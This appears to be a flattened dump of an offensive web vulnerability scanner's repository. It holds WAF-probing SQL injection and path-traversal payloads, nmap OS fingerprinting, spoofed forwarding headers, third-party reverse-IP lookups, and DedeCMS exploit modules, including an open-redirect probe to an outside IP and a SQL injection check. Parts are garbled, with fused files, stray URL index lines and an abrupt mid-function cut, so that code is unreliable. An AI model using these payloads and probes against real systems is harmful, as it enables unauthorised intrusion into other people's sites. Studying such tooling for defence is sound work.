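may trigger blocking or rate limiting, so only run them against systems you
are authorised to test.
'''

payload = (
    "/index.php?id=1 AND 1=1 UNION ALL SELECT 1,NULL,'',table_name FROM information_schema.tables WHERE 2>1--/**/",
    "/../../../etc/passwd", "/.git/", "/phpinfo.php")


def verify(headers, content):
    """Match one response against WAF_RULE; return the WAF name or 'NoWAF'.

    Each rule is a string ``name|method|position|regex``.  ``method`` is
    ``headers`` (apply ``regex`` to the response header named ``position``,
    e.g. ``CacheFly CDN|headers|BestCDN|CacheFly``) or anything else (apply
    ``regex`` to the body).  The regex is the remainder of the rule: splitting
    with ``maxsplit=3`` keeps a regex that itself contains ``|`` (alternation)
    intact instead of raising ValueError on the 4-way unpack.

    Args:
        headers: response header mapping (requests' is case-insensitive).
        content: response body text.
    """
    for rule in WAF_RULE:
        try:
            name, method, position, regex = rule.split('|', 3)
        except ValueError:
            # Malformed rule (fewer than 4 fields): skip it, don't abort the scan.
            continue
        if method == 'headers':
            value = headers.get(position)
            if value is not None and re.search(regex, str(value)) is not None:
                return name
        elif re.search(regex, str(content)):
            return name
    return 'NoWAF'


def checkwaf(url):
    """Detect a WAF in front of *url*; return its name or 'NoWAF'.

    A plain GET is inspected first; only if that shows nothing are the attack
    payloads appended to *url* one by one, stopping at the first match.

    Always returns a string.  Previously an unreachable target or an exhausted
    payload list fell off the end of the function and returned None, which a
    caller testing ``!= 'NoWAF'`` would have mistaken for a detection.
    """
    result = 'NoWAF'
    try:
        req = Requests()
        r = req.get(url)  # None when the target could not be reached
        if r is None:
            return result
        result = verify(r.headers, r.text)
        if result != 'NoWAF':
            return result
        for probe in payload:
            r = req.get(url + probe)
            if r is None:
                continue  # one failed probe should not end the check
            result = verify(r.headers, r.text)
            if result != 'NoWAF':
                return result
    except Exception:
        # Best effort: a bad rule regex or an unexpected transport error must
        # not abort the whole scan; report "nothing detected" instead.
        result = 'NoWAF'
    return result


if __name__ == "__main__":
    # checkwaf takes a single URL; the old two-argument call raised TypeError.
    out = checkwaf('http://127.0.0.1')
    print(out)


# ---- /Information_Scan/plugins/ActiveReconnaissance/osdetect.py ----
import re
import nmap
import xml
from lib.cli_output import console

# The host is placed on nmap's command line.  python-nmap splits the hosts
# string into separate argv entries, so a value such as "1.2.3.4 -iL /etc/x"
# would inject extra nmap options.  Accept only hostname / IPv4 / IPv6 / CIDR
# characters and refuse anything that starts with '-'.
_SAFE_HOST = re.compile(r'^[A-Za-z0-9.\-:/]+$')


def osdetect(ip):
    """Return nmap's best OS match name for *ip*, or None.

    Runs ``nmap -sS -O -vv -n -T4 -p 80,22,443``.  SYN scan and OS
    fingerprinting need raw-socket privileges (root / CAP_NET_RAW); without
    them nmap fails and this returns None.  The first ``osmatch`` name is
    printed via console() and returned; 'None' is printed on error.
    """
    if not ip or ip.startswith('-') or not _SAFE_HOST.match(ip):
        console('OSdetect', str(ip), 'None\n')
        return None

    nm = nmap.PortScanner()
    try:
        result = nm.scan(hosts=ip, arguments='-sS -O -vv -n -T4 -p 80,22,443')
        for _host, info in result.get('scan').items():
            matches = info.get('osmatch')
            if not matches:
                break  # first host without a match ends the search (original behaviour)
            name = matches[0].get('name')
            console('OSdetect', ip, name + '\n')
            return name
    except Exception:
        # nmap not installed, insufficient privileges, host down, XML parse error...
        console('OSdetect', ip, 'None\n')
    return None


if __name__ == "__main__":
    os = osdetect('127.0.0.1')


# ---- /Information_Scan/plugins/ActiveReconnaissance/robots.py ----
# ---- /Information_Scan/plugins/PassiveReconnaissance/ip_history.py ----
# NOTE(review): the listing of these two files was mangled during extraction
# (text between '<' and '>' was stripped, fusing robots.py's status-code check
# into ip_history.py's regex).  Their source is not reproduced here rather
# than guessed at.

# ---- /Information_Scan/plugins/PassiveReconnaissance/reverse_domain.py ----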
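import requests
import json
import tldextract  # splits a host into subdomain / registered domain / public suffix
import re
from lib.cli_output import console
from Information_Scan.random_header import get_ua

# Lines accepted from the hackertarget fallback: hostname or IP characters
# only.  Anything with spaces or markup is an error message ("error check your
# search parameter", "API count exceeded ...") or an HTML page, not a domain.
_HOST_LINE = re.compile(r'^[A-Za-z0-9.\-]+$')


def reverse_domain(host):
    """List other names hosted on the same IP as *host* (virtual-host neighbours).

    OPSEC: the target is sent to two THIRD-PARTY services --
    domains.yougetsignal.com first, api.hackertarget.com as fallback -- so
    both learn which host is being scanned.  Both calls use HTTPS with
    certificate verification ON: these are public APIs with valid
    certificates, and there is no reason to accept a spoofed response whose
    content ends up in the report database.  (Behind a TLS-intercepting
    proxy, point REQUESTS_CA_BUNDLE at the corporate CA instead of disabling
    verification.)

    Returns:
        The neighbour names/IPs found (each also printed via console()), or a
        one-element placeholder list when more than 20 were found.
    """
    result = []
    data = {"remoteAddress": "{0}".format(host), "key": ""}
    header = get_ua()
    try:
        r = requests.post('https://domains.yougetsignal.com/domains.php',
                          headers=header,
                          data=data,
                          timeout=5,
                          verify=True)
        text = json.loads(r.text)
        domain = tldextract.extract(host)
        for entry in text.get('domainArray'):
            url = entry[0]
            if url == host:
                continue
            if tldextract.extract(url).domain == domain.domain:
                result.append(url)  # same registered domain, e.g. m.x.com / top.x.com
            elif re.search(r'\d+\.\d+\.\d+\.\d+', url):
                result.append(url)  # bare IPv4
    except Exception:
        # yougetsignal unreachable / non-JSON reply: try hackertarget's
        # plain-text API (one host per line).
        try:
            r = requests.get('https://api.hackertarget.com/reverseiplookup/?q={}'.format(host),
                             headers=get_ua(),
                             timeout=4,
                             verify=True)
            if 'No DNS A records found for' not in r.text:
                # The original guard here was `'' not in r.text`, which is
                # always False (most likely an HTML tag lost in extraction), so
                # this fallback never returned anything.  Keep only lines that
                # look like a hostname or IP, which also drops HTML/error pages.
                for line in r.text.split('\n'):
                    line = line.strip()
                    if line and _HOST_LINE.match(line):
                        result.append(line)
            else:
                result = []
        except Exception:
            pass

    if len(result) >= 20:
        console('reverse_domain', host, 'The maximum number of domain names exceeded (20)\n')
        return ['The maximum number of reverse_domain names exceeded (20)']
    if result:
        for name in result:
            console('reverse_domain', host, name + '\n')
    else:
        console('reverse_domain', host, 'None\n')
    return result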
/Information_Scan/plugins/Scanning/__pycache__/async_scan.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/async_scan.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/Scanning/__pycache__/async_scan.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/async_scan.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/Scanning/__pycache__/check_target.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/check_target.cpython-37.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/Scanning/__pycache__/check_target.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/check_target.cpython-38.pyc -------------------------------------------------------------------------------- /Information_Scan/plugins/Scanning/__pycache__/port_scan.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/port_scan.cpython-37.pyc 
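# (binary: /Information_Scan/plugins/Scanning/__pycache__/port_scan.cpython-38.pyc)

# ==== /Information_Scan/plugins/Scanning/check_target.py ====
import hashlib
import random
import string
import sys
import urllib.parse  # `import urllib` alone does not guarantee the submodule
import requests

USER_AGENT = "Mozilla/5.0 (Windows; U; MSIE 10.0; Windows NT 9.0; es-ES)"
user_agent = {"user-agent": USER_AGENT}


class Inspector:
    """Probe how a target answers a request for a page that cannot exist.

    The result tells the directory brute-forcer how to recognise "not found"
    on this particular site: a genuine 404, a redirect, or a soft-404 page that
    has to be matched by MD5.
    """
    TEST404_OK = 0      # server answers a genuine 404
    TEST404_MD5 = 1     # soft 404: compare page MD5 against the returned one
    TEST404_STRING = 2  # declared but never produced by check_this()
    TEST404_URL = 3     # not-found requests are redirected; compare the location
    TEST404_NONE = 4    # declared but never produced by check_this()

    def __init__(self, target):
        self.target = target  # base URL; a random name is appended verbatim

    def _give_it_a_try(self):
        """Request one random 42-letter resource under ``self.target``.

        Returns a dict with the host, the HTTP status (as a string), body size,
        body MD5, the body itself and, if the request was redirected, the final
        URL under ``'location'``.  On any request failure the same keys are
        returned with empty strings, so callers never see an exception.
        """
        # 42 random lower-case letters (the original randrange(97, 122) could
        # never produce 'z'; harmless, but needlessly odd)
        name = "".join(random.choice(string.ascii_lowercase) for _ in range(42))
        # NOTE: appended without a separator — a target without a trailing '/'
        # gets the letters glued onto its last path segment
        target = self.target + name
        netloc = urllib.parse.urlparse(target).netloc

        try:
            # verify=False is intentional here: the target is the scan subject
            # and frequently serves a self-signed certificate
            page = requests.get(target, headers=user_agent, verify=False, timeout=5)
        except Exception:
            return {
                'target': netloc,
                'code': '',
                'size': '',
                'md5': '',
                'content': '',
                'location': None,
            }

        content = page.content
        result = {
            'target': netloc,
            'code': str(page.status_code),
            'size': len(content),
            'md5': hashlib.md5(content).hexdigest(),
            'content': content,
            'location': None,
        }
        if page.history:
            # at least one redirect was followed: remember where we ended up
            result['location'] = page.url
        return result

    def check_this(self):
        """Classify the not-found behaviour of the target.

        Returns ``(marker, kind)`` where ``kind`` is one of the ``TEST404_*``
        constants and ``marker`` is the redirect location for ``TEST404_URL``,
        the page MD5 for ``TEST404_MD5`` and ``''`` for ``TEST404_OK``.
        A failed request (empty status) lands in the MD5 branch with an empty
        digest, exactly as before; ``TEST404_NONE`` is still never returned
        (the original's final ``return`` was unreachable), so callers must not
        rely on it.
        """
        first_result = self._give_it_a_try()

        if first_result['code'] == '404':
            return '', Inspector.TEST404_OK
        if first_result['code'] == '302' or first_result['location']:
            return first_result['location'], Inspector.TEST404_URL
        return first_result['md5'], Inspector.TEST404_MD5


if __name__ == '__main__':
    i = Inspector(sys.argv[1])
    print(i.check_this())


# ==== /Information_Scan/random_header.py ====
import random
import socket
import string
import struct
from fake_useragent import UserAgent

HEADERS = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'User-Agent': "",
    'Referer': "",
    'X-Forwarded-For': "",
    'X-Real-IP': "",
    'Connection': 'keep-alive',
}


def get_ua():
    """Build a randomised request header set.

    Picks a User-Agent from ``Information_Scan/data/path/user-agents.txt``
    (path is relative to the working directory), a random
    ``www.<1-20 alphanumerics>.com`` Referer and a random IPv4 for
    ``X-Forwarded-For`` / ``X-Real-IP``.  The module-level ``HEADERS`` dict is
    still updated in place for anyone reading it directly, but a *copy* is
    returned: the original handed every caller the same shared dict, so under
    gevent's monkey patching two in-flight requests could see each other's
    headers being rewritten.
    """
    with open(r'Information_Scan/data/path/user-agents.txt', 'r', encoding='utf-8') as f:
        # blank lines used to end up in the pool and produce an empty User-Agent
        ua = [line.strip() for line in f if line.strip()]

    # the original used int(random.random() * 20), which can be 0 and then
    # yields the malformed Referer 'www..com'
    length = random.randint(1, 20)
    referer = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
    referer = 'www.' + referer.lower() + '.com'
    # random 32-bit value packed big-endian and rendered as a dotted quad
    ip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))

    HEADERS["User-Agent"] = random.choice(ua)
    HEADERS["Referer"] = referer
    HEADERS["X-Forwarded-For"] = HEADERS["X-Real-IP"] = ip

    return dict(HEADERS)


if __name__ == "__main__":
    print(get_ua())


# ==== /Information_Scan/url.py ====
from urllib import parse
import re
import dns.resolver

# answers that are resolver / placeholder addresses rather than the target
_PLACEHOLDER_IPS = {'1.1.1.1', '8.8.8.8', '127.0.0.1', '114.114.114.114', '0.0.0.0'}


def parse_host(url):
    """Return the bare hostname of ``url``.

    ``http://www.baidu.com:80/a/b?x=1`` -> ``www.baidu.com``; a bare hostname
    or ``host:port`` is accepted too.  The scheme, everything from the first
    ``/``, ``?`` or ``#`` onward, and a numeric port are removed.

    The published version had two identical branches and stripped only
    ``/word`` path segments with ``re.sub(r'/\\w+', '', host)``, so paths
    containing ``-``, ``.`` or a query string leaked into the host
    (``a.com/x-y`` became ``a.com-y``).
    """
    host = re.sub(r'^https?://', '', url.strip(), count=1)
    host = re.split(r'[/?#]', host, maxsplit=1)[0]
    host = re.sub(r':\d+$', '', host)  # drop an explicit port
    return host


def parse_ip(host):
    """Resolve ``host`` to an IPv4 address via 1.1.1.1 / 8.8.8.8.

    Returns the first A record that is not in ``_PLACEHOLDER_IPS``.  If
    resolution fails or every answer is filtered, the *hostname* is returned
    unchanged — callers that need a real IP must check for that.

    The original filtered with an unanchored regex, so a legitimate address
    such as ``21.1.1.1`` or ``18.8.8.8`` was discarded as a placeholder.
    """
    host = parse_host(host)
    try:
        resolver = dns.resolver.Resolver()
        resolver.nameservers = ['1.1.1.1', '8.8.8.8']
        # resolver.query() is the dnspython 1.x name (deprecated but still
        # present in 2.x); kept so the installed version does not matter
        answer = resolver.query(host, 'A')
        for rrset in answer.response.answer:
            for rdata in rrset.items:
                if hasattr(rdata, 'address') and rdata.address not in _PLACEHOLDER_IPS:
                    return rdata.address
    except Exception:
        # best effort: any DNS error falls through to returning the hostname
        pass
    return host


# ==== /Information_Scan/web_info.py ====
import chardet  # detects the response encoding
from Information_Scan.plugins.ActiveReconnaissance.osdetect import osdetect
from Information_Scan.url import parse_host, parse_ip
from Information_Scan.plugins.InformationGathering.geoip import geoip
from Information_Scan.Requests import Requests
from lib.cli_output import console
from lib.sqldb import Sqldb
from Information_Scan.plugins.PassiveReconnaissance.wappalyzer import WebPage
from Information_Scan.plugins.ActiveReconnaissance.check_waf import checkwaf


def subdomain_save(data):
    """Persist a ``web_info`` result dict in the ``result`` database."""
    Sqldb('result').get_subdomain(data)


def web_info(url, flags=1):
    """Collect the per-host summary shown on the report page.

    Resolves ``url`` to a host and IP, geolocates the IP, runs WAF detection,
    fetches the page to fingerprint it (title / apps / server) and runs the
    nmap OS probe.  With ``flags == 1`` returns ``(data, apps, title)``; with
    any other value the data is stored via ``subdomain_save`` and nothing is
    returned.

    Note: when the fetch or fingerprinting fails, ``Webinfo`` is an empty dict
    and the WAF result is reported as ``'None'`` even if ``checkwaf`` found
    something — kept as in the original.
    """
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    address = geoip(ipaddr)
    wafresult = checkwaf(url)
    req = Requests()
    try:
        r = req.get(url)
        # re-decode with the detected charset so the title is not mojibake
        r.encoding = chardet.detect(r.content).get('encoding')
        webinfo = WebPage(r.url, r.text, r.headers).info()
    except Exception:
        webinfo = {}

    if webinfo:
        console('Webinfo', host, 'Title: {}\n'.format(webinfo.get('title')))
        console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps')))
        console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server')))
        console('Webinfo', host, 'WAF: {}\n'.format(wafresult))
    else:
        webinfo = {}
        wafresult = 'None'
    osname = osdetect(host)

    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }

    if flags == 1:
        return data, webinfo.get('apps'), webinfo.get('title')
    subdomain_save(data)


if __name__ == "__main__":
    web_info('http://127.0.0.1')

# ==== /JR.py ====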
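# ==== /JR.py ====
import sys
import gevent
from gevent import monkey
monkey.patch_all()
from report import gener
from lib.cli_output import banner
from lib.cli_output import usage
from lib.bcolors import Bcolors
from lib.enter import add
from Information_Scan.common import start
from POC_Scan.main import poc_use
from POC_Scan.main import search, show_poc, use
from lib.sqldb import Sqldb
from AWVS_Check.AWVS import awvs


def _split_command(line):
    """Split an interactive ``command [argument]`` line into a pair.

    Returns ``(command, keywords)``; ``keywords`` is ``''`` when only one word
    was typed.  The original ``command, keywords = line.split()`` raised
    ``ValueError`` on one word (e.g. a bare ``back``) or on three or more,
    which escaped ``handle`` and killed the whole CLI.
    """
    parts = line.split(maxsplit=1)
    if not parts:
        return '', ''
    if len(parts) == 1:
        return parts[0], ''
    return parts[0], parts[1].strip()


class JR(object):
    """Interactive menu driving the scanner's sub-tools."""

    def handle(self):
        """Run the top-level prompt until ``exit`` or Ctrl+C.

        Menu items: 1 information scan, 2 POC scan (own sub-prompt), 3 AWVS
        control (own sub-prompt), 4 HTML report, 5 help, 6 exit.  Results are
        written to the ``result`` database.
        """
        try:
            dbname = 'result'
            banner()
            print('-' * 43)
            usage()
            print('-' * 43)
            while True:
                show = input(Bcolors.RED + '[JR]>> ' + Bcolors.ENDC)
                if show in ['1', 'Information_Scan']:
                    self._information_scan(dbname)
                elif show in ['2', 'POC_Scan']:
                    self._poc_scan(dbname)
                elif show in ['3', 'AWVS_Check']:
                    self._awvs_check()
                elif show in ['4', 'H5_Create']:
                    gener()
                elif show in ['5', 'Help']:
                    usage()
                elif show in ['6', 'exit']:
                    break
                elif show == '':
                    pass
                else:
                    print(Bcolors.WARNING + '[-] 提示: 输入错误...' + Bcolors.ENDC)
        except KeyboardInterrupt as e:
            print(e)

    def _information_scan(self, dbname):
        """Prompt for targets and run the information scan on each live one."""
        target = input(Bcolors.RED + '[JR/Information_Scan/Set_Target]>>' + Bcolors.ENDC)
        lives = add(target)
        for i in lives:
            start(i, dbname)

    def _poc_scan(self, dbname):
        """POC sub-prompt: ``search <kw>`` / ``show poc`` / ``use <name>`` / ``back menu``."""
        poc_use()
        while True:
            command, keywords = _split_command(
                input(Bcolors.RED + '[JR/POC_Scan/]>>' + Bcolors.ENDC))
            if command == 'search' and keywords:
                search(keywords)
            elif command == "show" and keywords == 'poc':
                show_poc()
            elif command == 'use' and keywords:
                target = input(Bcolors.RED + '[JR/POC_Scan/Set_Target]>>' + Bcolors.ENDC)
                lives = add(target)
                for live in lives:
                    for i in use(keywords, live):
                        Sqldb(dbname).get_vuln(i, keywords)
            elif command == 'back' and keywords == 'menu':
                break
            else:
                print(Bcolors.WARNING + '[-] 提示: 输入错误...' + Bcolors.ENDC)

    def _awvs_check(self):
        """AWVS sub-prompt: ``scan`` / ``stop`` / ``delete`` / ``view`` / ``back``."""
        awvs_check = awvs()
        awvs_check.usage()
        while True:
            command = input(Bcolors.RED + '[JR/AWVS_Check/]>>' + Bcolors.ENDC)
            if command == 'scan':
                awvs_check.scan()
            elif command == "stop":
                awvs_check.stop()
            elif command == 'delete':
                awvs_check.delete()
            elif command == 'view':
                awvs_check.view()
            elif command == 'back':
                break
            else:
                print(Bcolors.WARNING + '[-] 提示: 输入错误...' + Bcolors.ENDC)


if __name__ == '__main__':
    try:
        jr = JR()
        jr.handle()
    except KeyboardInterrupt:
        print('\nCtrl+C Stop running\n')
        sys.exit(0)

# (binary: /POC_Scan/__pycache__/main.cpython-37.pyc, main.cpython-38.pyc, pocdb.cpython-37.pyc)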
-------------------------------------------------------------------------------- /POC_Scan/__pycache__/pocdb.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/__pycache__/pocdb.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/__pycache__/cmsmain.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__pycache__/cmsmain.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/__pycache__/cmsmain.cpython-38.pyc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__pycache__/cmsmain.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_download_redirect.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_download_redirect.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_download_redirect.cpython-38.pyc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_download_redirect.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_error_trace_disclosure.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_error_trace_disclosure.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_error_trace_disclosure.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_error_trace_disclosure.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_recommend_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_recommend_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_recommend_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_recommend_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_search_typeArr_sqli.cpython-37.pyc: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_search_typeArr_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_search_typeArr_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_search_typeArr_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_version.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_version.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/__pycache__/dedecms_version.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_version.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/dedecms_download_redirect.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: dedecms download.php重定向漏洞 5 | referer: http://skyhome.cn/dedecms/357.html 6 | author: Lucifer 7 | description: 在dedecms 5.7sp1的/plus/download.php中67行存在的代码,即接收参数后未进行域名的判断就进行了跳转。 NOTE(review): the probe's `link=aHR0cDovLzQ1Ljc2LjE1OC45MS9zc3Jm` is base64 for http://45.76.158.91/ssrf, a third-party host not under this project's control; because `requests.get` follows redirects by default, a vulnerable target makes the scanner itself connect to that host, and the verdict depends on whatever that host serves (the `100e8a82eea1ef8416e585433fd8462e` marker). Prefer `allow_redirects=False` and compare the `Location` header against the decoded URL, with a neutral target such as example.com encoded in the payload. 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 
| class dedecms_download_redirect_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 21 | } 22 | payload = "/plus/download.php?open=1&link=aHR0cDovLzQ1Ljc2LjE1OC45MS9zc3Jm" 23 | vulnurl = self.url + payload 24 | try: 25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 26 | if r"100e8a82eea1ef8416e585433fd8462e" in req.text: 27 | cprint("[+]存在dedecms download.php重定向漏洞...(低危)\tpayload: "+vulnurl, "blue") 28 | return True 29 | else: 30 | cprint("[-]不存在dedecms_download_redirect漏洞", "white", "on_grey") 31 | 32 | except: 33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 34 | 35 | if __name__ == "__main__": 36 | warnings.filterwarnings("ignore") 37 | testVuln = dedecms_download_redirect_BaseVerify(sys.argv[1]) 38 | testVuln.run() 39 | -------------------------------------------------------------------------------- /POC_Scan/cms/dedecms/dedecms_error_trace_disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: dedecms trace爆路径漏洞 5 | referer: http://0daysec.blog.51cto.com/9327043/1571372 6 | author: Lucifer 7 | description: 访问mysql_error_trace.inc,mysql trace报错路径泄露。 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 | class dedecms_error_trace_disclosure_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 21 | } 22 | payload = "/data/mysql_error_trace.inc" 23 | vulnurl = self.url + payload 24 | try: 25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 26 | if r"可能不存在漏洞", "cyan") 
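# (tail of /POC_Scan/cms/dedecms/dedecms_error_trace_disclosure.py)

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = dedecms_error_trace_disclosure_BaseVerify(sys.argv[1])
    testVuln.run()


# ==== /POC_Scan/cms/dedecms/dedecms_recommend_sqli.py ====
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# The metadata docstring below is kept verbatim (it is presumably what the
# POC index reads for `search` / `show poc`; not verified from here).
# Translation: recommend.php includes include/common.inc.php; any URL
# parameter not matching cfg_|GLOBALS|_GET|_POST|_COOKIE passes the filter,
# so _FILES[type][tmp_name] overwrites $type, which is then used in the query.
'''
name: dedecms recommend.php SQL注入
referer: http://blog.csdn.net/change518/article/details/20564207
author: Lucifer
description: 1.首先执行到plus/recommand.php,包含了include/common.inc.php
2.只要提交的URL中不包含cfg_|GLOBALS|_GET|_POST|_COOKIE,即可通过检查,_FILES[type][tmp_name]被带入
3.在29行处,URL参数中的_FILES[type][tmp_name],$_key为type,$$_key即为$type,从而导致了$type变量的覆盖
4.回到recommand.php中,注入语句被带入数据库查询
'''
import sys
import requests
import warnings
from termcolor import cprint


class dedecms_recommend_sqli_BaseVerify:
    """DedeCMS /plus/recommend.php SQL injection check.

    The payload uses the ``_FILES[type][tmp_name]`` variable overwrite to
    inject ``md5(1234)``; the target is vulnerable when the digest
    ``81dc9bdb52d04dc20036dbd8313ed055`` echoes back.  The injected SELECT
    names the ``#@__admin`` table but only returns constants, so no target
    data is extracted by this probe.
    """

    def __init__(self, url):
        self.url = url  # base URL of the target, without trailing slash

    def run(self):
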